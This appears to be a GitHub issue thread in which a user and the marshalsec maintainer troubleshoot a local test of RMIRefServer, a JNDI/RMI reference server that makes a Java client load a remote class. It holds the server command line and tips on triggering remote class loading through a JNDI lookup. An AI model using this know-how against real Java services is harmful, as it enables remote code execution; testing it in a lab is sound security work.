marshalsec.jndi.RMIRefServer closed connection, but client got stuck

[CaledoniaProject]

I have a simple rmi client:

import java.io.*;
import javax.naming.*;
import java.rmi.registry.*;

public class rmiClient {
    public static void main(String[] args) throws Exception {
        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
        registry.lookup("test");
    }
}

And I started the reference server with JDK8u11

/home/jdk/8u11/bin/java -cp marshalsec.jar marshalsec.jndi.RMIRefServer 'http://127.0.0.1#TEST.class' 1099
* Opening JRMP listener on 1099

When I invoke the rmi client, marshalsec outputs the following:

Have connection from /127.0.0.1:47636
Reading message...
Is RMI.lookup call for wtf 2
Sending remote classloading stub targeting http://127.0.0.1/TEST/class.class
Closing connection

No request is sent to http://127.0.0.1 (from nginx access log) and the rmi client is stuck.

What was wrong? FYI: ysoserial.exploit.JRMPListener works fine

[mbechler]

Is the exploited target also using the same Java version? This is the relevant version, not the one you run the server with. Also add a trailing slash to the classpath URL, otherwise this will try to load a JAR file at that location.

[CaledoniaProject]

Yes, same version running on the same host. Attached jstack on the rmiClient: jstack.txt

[mbechler]

Ah, I did not closely look at the client code the first time. Directly performing a Registry lookup will not trigger resolving the Reference, only if you do the lookup through JNDI. E.g. something like `new InitialContext().lookup("rmi://127.0.0.1/test"). Also no need to a add .class to the fragment when starting RMIRefServer, that should just be the classname.

[CaledoniaProject]

Indeed. I've created another java app and confirmed it. Thanks!